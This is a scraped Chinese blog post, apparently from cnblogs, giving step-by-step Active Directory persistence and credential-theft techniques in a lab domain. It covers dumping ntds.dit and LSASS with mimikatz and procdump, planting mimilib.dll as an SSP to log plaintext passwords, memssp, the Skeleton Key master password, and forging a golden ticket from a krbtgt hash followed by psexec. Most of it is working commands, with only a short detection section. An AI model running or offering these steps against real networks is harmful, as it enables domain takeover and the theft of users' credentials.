zoukankan      html  css  js  c++  java
  • ntds.dit和SSP权限维持

    5.获取访问活动目录数据库文件的权限(ntds.dit)
    前提条件是获取域控权限:
    1.通过备份路径(备份服务器储存,媒体,网络共享)
    2 在准备配置成域控的服务器上找 NTDS.dit 文件
    3. 有虚拟机的管理权限,就能克隆虚拟的域控并离线获取数据
    4. 用 Mimitaz 导出域中所有凭证的 hash 值
    mimikatz.exe “privilege::debug” “lsadump::lsa /inject” >hash.txt
    6.用 Mimikatz+procdump 导出 LSASS 内存信息(获得域管理员凭证)
    Procdump.exe -accepteula -ma lsass.exe lsass.dmp
    mimikatz.exe # sekurlsa::minidump lsass.dmp
    mimikatz.exe # sekurlsa::logonpasswords
    7.用任务管理器来导出 LSASS 内存信息(获得域管理员凭证)
    选择任务管理器中的 lsass.exe 然后右击创建转储文件
    八、mimilib SSP 维持系统权限
    1. 前言
    Security Support Provider,直译为安全支持提供者,又名 Security Package.
    简单的理解为 SSP 就是一个 DLL,用来实现身份认证,并且维持系统权限
    mimilib.dll 是 mimikatz 下的动态链接库。可维持系统权限。
    2.实际测试
    测试环境
    域控:server 2008 r2 x64
    域内主机: win7 x64
    测试步骤:
    1、添加 SSP
    将 mimilib.dll 复制到域控 c:windowssystem32 下
    注:64 位系统要用 64 位的 mimilib.dll,32 位的会失败
    2、设置 SSP
    修改域控注册表位置:
    HKEY_LOCAL_MACHINESystemCurrentControlSetControlLsaSecurity
    Packages
    如图 :
    在 Security Packages 下添加 mimilib.dll
    如图 :
    点击确认,Security Packages 已被添加 mimilib.dll
    如图 :
    3、重启系统
    域控重启后在 c:windowssystem32 可看到新生成的文件 kiwissp.log
    如图:
    kiwissp.log 记录了登录的账户和密码,如图:
    Tips:
    mimilib 只实现了将密码保存到本地,如果把密码发送到远程服务器岂不是威力无穷?
    补充
    1、Memory Updating of SSPs
    mimikatz 同时还支持通过内存更新 ssp,这样就不需要重启再获取账户信息
    需要使用 mimikatz.exe,命令如下:
    privilege::debug
    misc::memssp
    注:
    1、32 系统需要 32 位的 mimikatz,如图:32位失败
    64位mimikatz成功!内存更新的方法在重启后会失效.
    4、检测
    1、注册表
    检测注册表位置:
    #!bash
    HKEY_LOCAL_MACHINESystemCurrentControlSetControlLsaSecurity
    Packages
    2、dll
    检测%windir%System32 是否有可疑 dll
    3、Autoruns
    使用工具 Autoruns 检测 LSA
    八、Skeleton Key 实现万能密码登录域
    1.前言
    Skeleton Key 被安装在 64 位的域控服务器上,支持 Windows Server2003—Windows
    Server2012 R2,能够让所有域用户使用同一个万能密码进行登录,现有的所有域用户使用
    原密码仍能继续登录,重启后失效
    Mimikatz支持 Skeleton Key
    2.实际测试
    测试环境
    域控:Server 2008 R2 x64
    域内主机: Win7 x64
    1、域内主机使用正确密码登录域控
    用户名:admin@payload.com
    密码:admin@123
    cmd 命令:
    net use \192.168.88.130c$ admin@123 /user:administrator@payload.com
    dir \192.168.88.130c$
    如图 :
    2、在域控上安装 Skeleton Key
    mimikatz 命令:
    privilege::debug
    misc::skeleton
    如图 :
    3、域内主机使用 Skeleton Key 登录域控
    (1)清除 net use 连接
    cmd 命令:
    net use \192.168.88.130c$ /del
    net use
    (2)使用 Skeleton Key 登录
    mimikatz 的默认 Skeleton Key 设置为 mimikatz,注意这里只能用主机名来远程登录,如
    果用 IP 地址就会出错。
    cmd 命令:
    net use \WIN-SVT5AN14FQI.payload.comc$ mimikatz /user:Micr067@payload.com
    dir \WIN-SVT5AN14FQI.payload.comc$
    如图 :
    (3)权限测试
    a、使用域内不存在的用户+Skeleton Key 登录
    b、使用域内普通权限用户+Skeleton Key 登录
    发现使用域内不存在的用户无法登录
    使用域内普通权限用户无法访问域控
    结论: Skeleton Key 只是给所有账户添加了一个万能密码,无法修改账户的权限
    九、普通域账号的 hash 值找回域管理
    1.前言
    利用这个的条件是在原来搞定域控的时候,已经导出过域用户的HASH,尤其是krbtgt 这个用户的。但是在你在内网干其他事情的时候,被人家发现了,你拥有的域管理员权限掉了,你现在还有一个普通的域用户权限,管理员做加固的时候又忘记修改 krbtgt密码了(很常见),我们还是能重新回来
    2.实际测试
    1.要重新拿回域管理员权限,首先要先知道域内的管理员有谁,这里的实验环境,通过截图可以看到域管理员是 administrator:
    net group “domain admins” /domain
    2.还要知道域 SID 是啥
    S-1-5-21-2589858836-2355546349-2491181575
    3.还有最重要的 krbtgt 用户的 ntlm 哈希:
    19069f46e63bbf268dcf93db50f02810
    4.然后该用神器 mimikatz 出场了,依次执行
    mimikatz # kerberos::purge
    mimikatz # kerberos::golden /admin:Administrator /domain:payload.com /sid:S-1-5-21-2589858836-2355546349-2491181575 /krbtgt:19069f46e63bbf268dcf93db50f02810 /ticket:Administrator.kiribi
    mimikatz # kerberos::ptt Administrator.kiribi
    mimikatz # kerberos::list
    mimikatz # kerberos::tgt
    到现在,我们又重新拥有域管理员权限了,可以验证下
    net use \WIN-SVT5AN14FQI.payload.comc$ (不需要输入密码)
    psexec.exe \WIN-SVT5AN14FQI.payload.com cmd
  • 相关阅读:
    eclipse新建web项目开发JSP
    配置tomcat系统日志--java eclipse
    Eclipse 导入外部项目无法识别为web项目并且无法在部署到tomcat下
    for和foreace的区别
    布局TextView和EditText区别,layout_width和lay_weight区别--Android Studio
    设备旋转,创建水平模式布局--Android studio
    关于点击Invalidate Caches/Restart禁止插件后,重新加载--Android Studio
    Android 全面插件化 RePlugin 流程与源码解析
    git分支开发,分支(feature)同步主干(master)代码,以及最终分支合并到主干的操作流程
    git使用流程
  • 原文地址:https://www.cnblogs.com/micr067/p/12519752.html
Copyright © 2011-2022 走看看